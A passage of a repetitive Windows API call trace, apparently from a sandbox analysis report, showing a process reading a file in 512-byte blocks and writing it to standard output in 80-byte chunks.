(hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.257] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.257] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.257] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.257] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.258] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.258] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.259] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.259] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.260] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.260] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.261] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.261] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.262] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.262] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.263] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.263] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] GetFileType (hFile=0x4c) returned 0x1 [0094.263] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.263] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] GetFileType (hFile=0x4c) returned 0x1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] GetFileType (hFile=0x4c) returned 0x1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] GetFileType (hFile=0x4c) returned 0x1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] GetFileType (hFile=0x4c) returned 0x1 [0094.264] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.264] WriteFile (in: hFile=0x4c, 